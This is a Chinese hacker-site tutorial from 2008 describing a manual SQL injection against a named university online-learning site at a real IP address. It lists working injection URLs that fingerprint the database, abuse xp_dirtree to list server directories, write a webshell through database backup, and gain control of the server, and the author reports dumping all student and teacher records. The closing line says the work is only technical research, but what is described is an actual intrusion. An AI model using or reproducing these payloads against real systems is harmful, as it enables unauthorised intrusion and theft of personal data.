设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 入侵技术 -> 文章内容 [站内搜索]  

 
拿电子科大网络学堂手工注入(新手篇)
作者:不详  来源:网络  发布时间:2008-4-29 21:12:28  发布人:www.hack86.com

没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上'
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'

有防注入系统,限制了我的IP,现在就可以用COOKIES注入器
进入注入:


填写相应信息,生成1.asp,放到我服务器上次,地址是:http://www.xuyunfeng.com.cn/1.asp
加上参数为:http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048
现在尝试注入;http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048'

提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048一:暴数据库信息:
1.判断数据库名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20db_name()>0%20and%20''='

暴出数据库名为:wlxt
2.判断数据库用户名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20user>0%20and%20''='

数据库名为:wlxt136
3.判断数据库权限:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20''='

暴出用户权限是:DB的,DB权限可以列目录,现在我们来列网站目录
二:列网站目录
1.创建表:xuyunfeng列C盘的文件和目录
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048';Drop%20TABLE%20xuyufeng;Create%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20xuyunfeng%20exec%20master..xp_dirtree%20"C:",%201,1--

提示防注入系统,不用管它,创建表成功
2:暴出C盘的文件和目录个数
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20''='

暴出一共有13个目录和文件
3.列出第一个文件和目录(目录前面有0)
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第一个目录为:ASFRoot
4:列出第二个文件或目录:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第二个目录名为:Config.Msi
5.列第三个文件或目录名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第三个目录为:Documents and Settings
依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站
我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份
写上一句话木马:
三:上传木马:
1.用到工具,DB备份工具

把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!

备份成功了,现在用一个免杀大马


点"给我冲进去"看是否成功!
http://218.6.168.52/wlxt/help.asp

成功了,输入密码进入!

我们成功拿到webshell,结束了这次检测!

我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!

[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

 

 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
免费QQ蓝钻体验(附考试答案)
8款QQ空间免费开场动画
 
Windows 内核漏洞 ms08025 分析 05-05
想提高GGAD(Google ADSense)收入.. 05-05
拒绝刊登私服广告 巴哈姆特遭大陆.. 05-05
DISCUZ!疑遭攻击 入侵者或为邪恶.. 05-05
三大措施设置数据库安全 保障网站.. 05-05
黑客谈国内僵尸网络的现状与发展.. 05-05
历史盘点 史上最优秀的二十款防火.. 05-05
深入认识如何选择与保护密码 05-05
安全策略新角度:细看本地权限之.. 05-05
我是如何让女友学会用Ubuntu的 05-05
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com